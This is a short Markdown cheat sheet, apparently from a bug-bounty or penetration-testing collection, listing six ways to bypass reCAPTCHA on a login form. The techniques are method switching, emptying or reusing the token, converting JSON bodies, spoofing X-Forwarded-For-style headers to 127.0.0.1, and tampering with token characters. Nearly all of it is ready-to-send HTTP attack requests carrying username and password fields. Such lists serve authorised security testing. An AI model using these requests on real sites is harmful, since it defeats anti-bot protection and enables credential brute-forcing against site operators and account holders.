78 lines
1.5 KiB
Markdown
78 lines
1.5 KiB
Markdown
# Bypass Captcha (Google reCAPTCHA)
|
|
|
|
1. Try changing the request method, for example POST to GET
|
|
```
|
|
POST / HTTP 1.1
|
|
Host: target.com
|
|
...
|
|
|
|
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
|
|
```
|
|
|
|
Change the method to GET
|
|
```
|
|
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
|
|
Host: target.com
|
|
...
|
|
```
|
|
|
|
2. Try remove the value of the captcha parameter
|
|
```
|
|
POST / HTTP 1.1
|
|
Host: target.com
|
|
...
|
|
|
|
_RequestVerificationToken=&_Username=daffa&_Password=test123
|
|
```
|
|
|
|
3. Try reuse old captcha token
|
|
```
|
|
POST / HTTP 1.1
|
|
Host: target.com
|
|
...
|
|
|
|
_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
|
|
```
|
|
|
|
4. Convert JSON data to normal request parameter
|
|
```
|
|
POST / HTTP 1.1
|
|
Host: target.com
|
|
...
|
|
|
|
{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
|
|
```
|
|
Convert to normal request
|
|
```
|
|
POST / HTTP 1.1
|
|
Host: target.com
|
|
...
|
|
|
|
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
|
|
```
|
|
|
|
5. Try custom header to bypass captcha
|
|
```
|
|
X-Originating-IP: 127.0.0.1
|
|
X-Forwarded-For: 127.0.0.1
|
|
X-Remote-IP: 127.0.0.1
|
|
X-Remote-Addr: 127.0.0.1
|
|
```
|
|
|
|
6. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.
|
|
```
|
|
POST / HTTP 1.1
|
|
Host: target.com
|
|
...
|
|
|
|
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
|
|
```
|
|
Try this to bypass
|
|
```
|
|
POST / HTTP 1.1
|
|
Host: target.com
|
|
...
|
|
|
|
_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123
|
|
```
|